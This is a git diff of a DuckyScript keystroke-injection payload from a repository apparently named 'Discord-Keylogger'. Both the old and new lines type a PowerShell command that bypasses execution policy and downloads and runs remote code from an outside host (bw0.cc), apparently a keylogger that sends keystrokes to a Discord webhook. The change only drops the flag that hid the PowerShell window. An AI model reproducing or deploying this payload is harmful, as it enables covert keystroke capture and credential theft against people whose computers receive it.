diff --git a/Discord-Keylogger/Keylogger-to-Discord.txt b/Discord-Keylogger/Keylogger-to-Discord.txt index 7028a24..63d3e76 100644 --- a/Discord-Keylogger/Keylogger-to-Discord.txt +++ b/Discord-Keylogger/Keylogger-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dckl) +STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dckl) ENTER